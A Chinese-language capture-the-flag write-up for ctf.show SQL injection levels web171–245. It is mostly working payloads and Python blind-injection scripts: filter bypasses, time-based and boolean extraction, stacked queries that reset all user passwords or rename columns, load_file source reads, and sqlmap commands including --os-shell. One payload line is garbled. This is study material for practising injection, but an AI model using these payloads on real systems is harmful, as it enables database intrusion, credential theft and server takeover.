目录
web171
web172
web173
web174
web175
web176
web177-179
web180-183
web184
web185
web187
web190
web191
web192
web193
web194
web195
web196
web197
web199
web201
web202
web203
web204
web205
web206
web207
web208
web209
web210
web211
web212
web213
web225
web245
web171
获取库名:1'union select 1,group_concat(schema_name),3 from information_schema.schemata%23获取表名:1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23获取字段名:1'union select 1,group_concat(password,username),3 from ctfshow_user%23
web172
这里可以使用 to_base64 编码。
1'union select 1,to_base64(password) from ctfshow_user where username="flag"%23
web173
使用16进制进行转换
1' union select 1,hex(password),3 from ctfshow_user3 where username='flag'%23
web174
进行写文件
1' union select 1,password from ctfshow_user4 into outfile '/var/www/html/1.txt'--+&page=1&limit
打开1.txt获取flag
web175
这里可以使用脚本跑
import requests
def get_pwd_len(url):
    """Binary-search the length of the password of the row with id=26.

    Args:
        url: endpoint whose ``id`` query parameter reaches a SQL query.

    Returns:
        None; the value found (``ans``) is printed.  The original author
        recorded the result as 45 (see the comment after the function).

    The only observable is timing: ``sleep(2)`` runs when
    ``length(password) > mid``, so a request that does not finish inside
    the 0.5 s client timeout is read as "greater".  Server side this is
    closed by a parameterized query; in logs the ``sleep(`` literal in the
    ``id`` parameter and the burst of near-identical requests are the
    obvious signatures.
    """
    head = 1
    tail = 100
    ans = 0
    while head < tail:
        mid = (head + tail ) >> 1
        # the payload uses no spaces or commas (see the web175 note below)
        payload = f"1'&&if(length((select(password)from(ctfshow_user5)where(id=26)))>{mid},sleep(2),0)#"
        # print(uname)
        param = {'id': payload,'page': '1','limit': '10'}
        # NOTE(review): this first request has no timeout, so it waits out the
        # whole sleep(2) whenever the condition is true, and its result is not
        # used; the timed request below is the one that drives the search.
        res = requests.get(url=url,params=param)
        try:
            # answered within 0.5 s -> no sleep -> length <= mid
            r = requests.get(url,params=param,timeout=0.5)
            tail = mid
            ans = mid
        except Exception as e :
            # timed out -> sleep(2) ran -> length > mid
            head = mid +1
    # NOTE(review): the indentation of this print was lost in the collapsed
    # paste; it is placed after the loop so it reports the final value.
    print(ans)
# password length: 45
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd_len(url)
def get_pwd(url):
    """Recover the 45-character password of the id=26 row, one character at a time.

    Args:
        url: same endpoint as ``get_pwd_len``.

    Returns:
        None; the recovered string is printed.

    Each position is binary-searched over ASCII 32..126 with the same
    timeout oracle as ``get_pwd_len``.  The i-th character is isolated with
    nested ``substr(... from N)`` and ``reverse()`` instead of
    ``substr(s, i, 1)`` because the payload may not contain commas
    (see the web175 note below).
    """
    ans = ""
    for i in range(1, 46):
        # print(i)
        # substr(pw from i) is the tail starting at i (46-i chars for a
        # 45-char string); reversed, its substr(... from 46-i) is the single
        # last character, i.e. the i-th character of the password.
        j = 46 - i
        # print(j)
        head = 32
        tail = 127
        while head <tail:
            mid = (head + tail) >> 1  # >> is a right shift; one shift halves the value
            payload = f"1'&&if(ascii(substr((reverse(substr((select(password)from(ctfshow_user5)where(id=26))from({i}))))from({j})))>{mid},sleep(2),0)#"
            # print(uname)
            param = {'id': payload,'page': '1','limit': '10'}
            try:
                # answered within 0.5 s -> ascii(char) <= mid
                res = requests.get(url=url,params=param,timeout=0.5)
                tail = mid
            except Exception as e:
                # timed out -> sleep(2) ran -> ascii(char) > mid
                head = mid + 1
        if head != 32:
            ans += chr(head)
        else:
            # head stays at 32 only when every comparison was false, i.e.
            # substr() returned '' (ascii 0): past the end of the password
            break
    print(ans)
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd(url)
无空格和逗号
web176
使用大小写绕过
-1'uNion seleCt 1,groUp_concAt(username,password),3 frOm ctfshow_user%23
web177-179
使用括号绕过:-1'union(select(1),(group_concat(username,password)),(3)from(ctfshow_user))%23使用注释绕过:-1'union/**/select/**/1,group_concat(username,password),3/**/from/**/ctfshow_user%23反引号绕过:-1'union/**/select`id`,`username`,`password`from`ctfshow_user`%23
web180-183
过滤了注释符:
-1'union%0cselect(1),(group_concat(username,password)),(3)from(ctfshow_user)where(1)and'1
web184
过滤了很多,这里使用脚本测试
使用脚本
import requests
url="http://6ca99d4f-ef75-4808-92e8-5fc1a7b9548e.challenge.ctf.show/select-waf.php"
flag="ctfshow{"
def str_to_hex(s):
    """Return *s* as a bare hex string (``'ab'`` -> ``'6162'``), without the ``0x`` prefix."""
    return ''.join([hex(ord(c)).replace('0x','') for c in s])
# Prefix-by-prefix boolean search through the tableName parameter.  The LIKE
# pattern is sent as a 0x... hex literal rather than a quoted string —
# presumably because quotes are among the many filtered characters (the
# writeup only says "过滤了很多").
# Oracle: the page text contains "$user_count = 1" when the
# GROUP BY pass HAVING pass LIKE '<known prefix><candidate>%' clause holds;
# that value looks like a row count printed by the page — unverified here.
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        data={
            #'tableName':"ctfshow_user a inner join ctfshow_user b on b.pass like {}".format("0x"+str_to_hex(flag+j+"%"))
            'tableName':f"ctfshow_user group by pass having pass like {'0x'+str_to_hex(flag+j+'%')}"
        }
        r=requests.post(url=url,data=data).text
        if "$user_count = 1" in r:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break
这里使用了like模糊查询。
web185
数字的表示,使用脚本
import requests
url = "http://47b18d10-5722-4603-961a-2ef4d5b872d8.challenge.ctf.show/select-waf.php"
flag = 'ctfshow{'
def createNum(n):
    """Spell the integer *n* (n >= 1) as ``true+true+...`` with n terms.

    The writeup's note for this level ("数字的表示") and the use of this
    helper for every number in the payload indicate that digits cannot be
    sent directly; MySQL evaluates ``true`` as 1, so the sum equals n.
    """
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
        return num
# Boolean search, one position at a time.  Positions 1..8 are skipped: they
# are the already-known "ctfshow{" prefix.
for i in range(45):
    if i <= 8:
        continue
    for j in range(127):
        # substr(b.pass, i, 1) regexp char(j): true when the i-th character is chr(j)
        data = {"tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{createNum(i)},{createNum(1)})regexp(char({createNum(j)})))"}
        r = requests.post(url, data=data)
        # NOTE(review): "$user_count = 43;" is what the author treats as a hit;
        # presumably the row count of the join when the ON condition is true.
        if r.text.find("$user_count = 43;") > 0:
            if chr(j) != ".":
                flag += chr(j)
                print(flag.lower())
                if chr(j) == "}":
                    exit(0)
                # NOTE(review): the break is reconstructed inside this branch;
                # that is the only placement under which '.' (which regexp-matches
                # any character) is skipped instead of ending the scan.
                break
web187
loadfile盲注
import requests
url="http://17e6ad41-8c34-4fb3-aa23-f9fbfc11d012.challenge.ctf.show/api/index.php"
flag="ctfshow{"
# Boolean blind read of the application's own source via load_file(): the
# condition is whether the file contents regexp-match the prefix guessed so
# far.  if(...) yields 0 on a match and 1 otherwise; the author treats the
# "密码错误" (wrong password) reply as the match case — how the 0 makes the
# username comparison succeed is not shown here.
# Defensively: load_file() needs the FILE privilege on the DB account; an
# application account should not have it.
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        payload="if((load_file('/var/www/html/api/index.php'))regexp('{}'),0,1)".format(flag+j)
        data={'username':payload,'password':1}
        r=requests.post(url=url,data=data)
        # the JSON body escapes non-ASCII, so 密码错误 appears as \u5bc6\u7801\u9519\u8bef
        if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break
web190
无过滤的盲注
import requests
url = "http://87a2c8d4-69ca-4617-b96c-ce3601bdc1a6.challenge.ctf.show/api/"
result = ""
# Boolean blind extraction: for each position i, binary-search the ASCII
# code of substr(<query>, i, 1) over 32..126.
# Oracle: msg == "密码错误" ("wrong password") is the true branch of the
# injected if(...)='1' test — the author reads it as "the admin row matched,
# only the password check failed"; any other message is the false branch.
# The differing error messages are what make this work; a single generic
# login failure message removes the signal.
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # table enumeration (result: ctfshow_fl0g)
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column enumeration (result: id,f1ag)
        #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # read the flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {'username': f"admin' and if(ascii(substr(({payload}),{i},1))>{mid},1,2)='1",'password': '1'}
        r = requests.post(url,data=data)
        if "密码错误" == r.json()['msg']:
            # ascii(char) > mid
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        # past the end of the string substr() is '' and ascii('') is 0, so
        # every comparison is false and head never leaves 32
        break
# NOTE(review): indentation of this print was lost in the collapsed paste;
# placed after the loop so it prints the final result once.
print(result)
web191
ord函数盲注
Author:Y4tacker
import requests
url = "http://646c4493-3a66-407e-8ddf-c59355418a23.challenge.ctf.show/api/"
result = ""
# Same binary search as web190, using ord() in place of ascii() (the
# writeup only says "ord 函数盲注"; which function is filtered is not stated).
# Oracle: msg == "密码错误" is the true branch of the injected if() test.
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # table enumeration (result: ctfshow_fl0g)
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column enumeration (result: f1ag)
        #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # read the flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {'username': f"admin' and if(ord(substr(({payload}),{i},1))>{mid},1,2)='1",'password': '1'}
        r = requests.post(url,data=data)
        if "密码错误" == r.json()['msg']:
            # ord(char) > mid
            head = mid + 1
        else:
            # print(r.text)
            tail = mid
    # NOTE(review): `last` is never read afterwards; kept as in the original
    # (its exact indentation was lost in the collapsed paste).
    last = result
    if head != 32:
        result += chr(head)
    else:
        # substr() past the end yields '' (ord 0): nothing matched, stop
        break
print(result)
web192
过滤 ord 和 ascii 函数
import requests
import string
url = "http://2c0073f7-8662-4a12-a742-f17e1818ed0a.chall.ctf.show/api/"
# candidate alphabet: space, '_', '{', '}', '-', a-z, 0-9
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
# ord() and ascii() are filtered at this level (see the web192 note), so
# instead of a binary search on the character code each position is tested
# against every candidate with regexp('<j>'): one request per candidate.
# Oracle as in web190: msg == "密码错误" is the true branch of the if() test.
for i in range(1,45):
    for j in flagstr:
        payload = f"admin' and if(substr((select group_concat(f1ag) from ctfshow_fl0g),{i},1)regexp('{j}'),1,2)='1"
        data = {'username': payload,'password': '1'}
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            flag += j
            print(flag)
            if "}" == j:
                exit(0)
            break
web193
过滤 substr
Author:feng
import requests
url='http://fc1e9e65-4116-4635-aebc-05e37fef775f.challenge.ctf.show/api/'
flag=""
# substr() is filtered at this level (see the web193 note), so the known
# prefix is grown with LIKE '<known><candidate>%' instead of a per-position
# comparison.  Note that '_' is a single-character wildcard inside a LIKE
# pattern; it is the last candidate in the alphabet.
# Oracle: the raw JSON text contains the escaped form of 密码错误.
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-,{}_":
        # table enumeration (result: ctfshow_flxg)
        #payload="' or if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}',1,0)-- -".format(flag+j+"%")
        # column enumeration (result: f1ag)
        #payload="' or if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg') like '{}',1,0)-- -".format(flag+j+"%")
        # read the flag
        payload="' or if((select group_concat(f1ag) from ctfshow_flxg) like '{}',1,0)-- -".format(flag+j+"%")
        data={'username':payload,'password':1}
        #print(payload)
        r=requests.post(url=url,data=data)
        #print(payload)
        # raw string: the JSON body carries 密码错误 as literal \uXXXX escapes
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break
web194
locate()正则注入
Author:Y4tacker
import requests
# 应该还可以用instr等函数,LOCATE、POSITION、INSTR、FIND_IN_SET、IN、LIKE
url = "http://dee436de-268a-408e-b66a-88b4c972e5f5.chall.ctf.show/api/"
final = ""
stttr = "flag{}-_1234567890qwertyuiopsdhjkzxcvbnm"
# Prefix search with locate(): locate(prefix, value) = 1 exactly when value
# starts with prefix.  Each candidate is appended to `final`, kept on a hit
# and removed again otherwise.  There is no break after a hit, so one pass of
# the inner loop can extend the prefix by several characters; the outer loop
# only repeats the pass.
# Oracle as in web190: msg == "密码错误" is the true branch of the if() test.
for i in range(1,45):
    for j in stttr:
        final += j
        # table enumeration (result: ctfshow_flxg)
        # payload = f"admin' and if(locate('{final}',(select table_name from information_schema.tables where table_schema=database() limit 0,1))=1,1,2)='1"
        # column enumeration (result: f1ag)
        # payload = f"admin' and if(locate('{final}',(select column_name from information_schema.columns where table_name='ctfshow_flxg' limit 1,1))=1,1,2)='1"
        payload = f"admin' and if(locate('{final}',(select f1ag from ctfshow_flxg limit 0,1))=1,1,2)='1"
        data = {'username': payload,'password': '1'}
        r = requests.post(url,data=data)
        if "密码错误" == r.json()['msg']:
            print(final)
        else:
            # candidate rejected: drop it again
            final = final[:-1]
web195
堆叠注入,这里使用16进制
前面的是admin,后面的是111,就是将所有用户的密码修改为111,之后登陆即可。
使用16进制原因:$sql = "select pass from ctfshow_user where username = {$username};";(没有字符串单引号包围)
0x61646d696e;update`ctfshow_user`set`pass`=0x313131;
web196
payload:1;select(1)
web197
利用alter改名:1;alter table `ctfshow_user` change `pass` `feng` varchar(255); alter table `ctfshow_user` change `id` `pass` varchar(255)
import requests
url = "http://5f5edc35-cd47-49e5-9252-5a3301edd9f3.challenge.ctf.show/api/"
# Stacked queries followed by a password guess.  On the first iteration the
# three ALTERs rotate the columns pass -> ppp, id -> pass, ppp -> id, so the
# former numeric id is presumably what the login then compares the password
# against.  Every iteration then tries admin (hex 0x61646d696e) with the
# small integer i as the password until the "登陆成功" (login succeeded)
# message appears.
# Defensively: schema changes from the web tier's DB account mean that
# account holds ALTER; a least-privilege application account would not.
for i in range(100):
    if i == 0:
        data = {'username': '0;alter table ctfshow_user change column `pass` `ppp` varchar(255);alter table ctfshow_user '
                            'change column `id` `pass` varchar(255);alter table ctfshow_user change column `ppp` `id` '
                            'varchar(255);','password': f'{i}'}
        r = requests.post(url, data=data)
    data = {'username': '0x61646d696e','password': f'{i}'}
    r = requests.post(url, data=data)
    if "登陆成功" in r.json()['msg']:
        print(r.json()['msg'])
        break
# login succeeded: flag is ctfshow{1e8cd464-117c-4863-a8ea-0e7b83d3d9fe}
web199
payload:
1;show tables
ctfshow_user
show tables; 会显示表名，也就是 ctfshow_user。那么这时会将查出来的这个值当成密码，也就是密码为 ctfshow_user。
sqlmap注入
web201
referer绕过
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web --T ctfshow_user --dump --batch
web202
data绕过:
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web --T ctfshow_user --dump --batch
web203
请求方式绕过(必须加index.php)
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain"--batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web --T ctfshow_user --dump --batch
web204
包含cookie
>python sqlmap.py -u http://41ecd4df-c94a-4612-af16-2b0b6c834e9e.challenge.ctf.show/api/index.php --data="id=1" --method=PUT --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=5gqkmm2fh7l226lf4s9q4nl444; ctfshow=885b1983b7f7963b7d736fd8b93c185f" -D ctfshow_web -T ctfshow_user --dump --batch
web205
访问安全连接
它先访问的getToken,
--safe-url 设置在测试目标地址前访问的安全链接；--safe-freq 设置两次注入测试之间访问安全链接的次数
python sqlmap.py -u http://158eb741-2a3a-4643-a9d6-94360dc171b9.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://158eb741-2a3a-4643-a9d6-94360dc171b9.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flax -C flagx --dump --batch
web206
符号闭合
python sqlmap.py -u http://cd7e2227-9bd9-4929-9e06-ae3781d38591.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://cd7e2227-9bd9-4929-9e06-ae3781d38591.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web --prefix="')" --suffix="#"-T ctfshow_flax --dump --batch
--prefix:前置闭合
--suffix:后置闭合
web207
--tamper 使用自己编写的脚本
python sqlmap.py -u http://7a02b099-af2d-45fe-9a06-562855b134c9.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://7a02b099-af2d-45fe-9a06-562855b134c9.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web207 --batch -D ctfshow_web -T ctfshow_flaxca -C flagvc --dump
web208
大小写空格前后包含
python sqlmap.py -u "http://fafc4bcc-ec09-4b48-96d1-665c8e7e967d.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://fafc4bcc-ec09-4b48-96d1-665c8e7e967d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --prefix="')" --tamper="space2comment(替换空格),randomcase(替换大小写)" --batch -D ctfshow_web -T ctfshow_flaxcac -C flagvca --dump
web209
过滤了星号等号和空格
编写脚本web209
python sqlmap.py -u http://aa386482-7cfb-4336-b39a-ae4c279921a4.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://aa386482-7cfb-4336-b39a-ae4c279921a4.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web209 -D ctfshow_web -T ctfshow_flav -C ctfshow_flagx --dump
web210
对base64进行解密
python sqlmap.py -u http://1c7a89da-dee8-4374-9d72-d1cdedb9583a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://1c7a89da-dee8-4374-9d72-d1cdedb9583a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavi -C ctfshow_flagxx --dump
web211
绕过翻转字符/
python sqlmap.py -u http://cd0fdb00-049a-4e5a-8ce1-547261224fb3.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://cd0fdb00-049a-4e5a-8ce1-547261224fb3.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavia -C ctfshow_flagxxa --dump
web212
过滤单引号空格,继续使用210脚本
sqlmap>python sqlmap.py -u http://e44ed589-be5e-4423-8e2c-4bca30a67e6c.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://e44ed589-be5e-4423-8e2c-4bca30a67e6c.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavis --dump
web213
使用os-shell一键getshell
python sqlmap.py -u http://517718e5-3471-4848-9ecf-ac4b22a4a01e.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://517718e5-3471-4848-9ecf-ac4b22a4a01e.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web210 --dump --os-shell --batch
上传文件后进行命令执行操作。
web225
堆叠注入handler读取数据。
payload:
?username=1';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;handler ctfshow_flagasa close;&page=1&limit=10
报错注入
web245
模板
api/?id=1' and extractvalue(1,concat(0x7e,([]),0x7e))-- #&page=1&limit=10表名
api/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))-- #&page=1&limit=10字段名
api/?id=1' and extractvalue(1,conccmn_name) from information_schema.columns where table_name='ctfshow_flagsa'),0x7e))-- #&page=1&limit=10数据 分开读
api/?id=1' and extractvalue(1,concat(0x7e,(select left(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10
api/?id=1' and extractvalue(1,concat(0x7e,(select right(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10
api/?id=1' and extractvalue(1,concat(0x7e,(select left(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10